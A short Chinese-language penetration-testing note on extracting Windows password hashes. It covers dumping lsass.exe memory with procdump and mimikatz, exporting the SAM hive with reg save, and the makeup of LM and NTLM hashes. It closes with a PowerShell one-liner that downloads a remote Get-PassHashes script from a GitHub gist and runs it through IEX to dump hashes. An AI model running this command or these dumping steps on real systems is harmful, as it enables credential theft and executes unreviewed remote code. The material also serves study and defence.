windows环境下，一般推荐用procdump配合mimikatz来读取密码。

windows的用户hash一般是存储在C:\windows\system32\config\SAM文件中（域控存在NTDS.dit文件中），只不过，就算是管理员权限，也是无法正常打开并读取文件内容，因此一般无法直接通过SAM文件获取用户hash。 可以通过reg save命令通过SAM文件dump出文件再使用mimikatz导出hash，详情后文会阐述。

lsass.exe是一个系统进程，用于本地安全认证，用户的hash信息就存在lsass.exe程序内存中。我们一般就是以lsass.exe进程为目标，使用工具从该进程中dump出已登录用户的hash相关信息

既然要获取用户hash，肯定需要了解hash组成及其含义：

LM-HASH主要经过大写转换，位数补全和DES加密等运算，最终生成一个32位字符串。 NTLM-HASH主要经过格式转换和MD4等运算，最终也是生成一个32位字符串。 在此不对具体算法进行深入研究，需要知道的是两者的运用环境：

使用powershell读取密码的原理和第一种类似，也是从lsass.exe进程中读取，需要管理员权限运行cmd，调用powershell。 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ATpiu/d656f76a7a93209ccfec2748fb71b9b7/raw/3ea13924b32d42d737a8ba058cea24cba81f10ec/Get-PassHashes.ps1');Get-PassHashes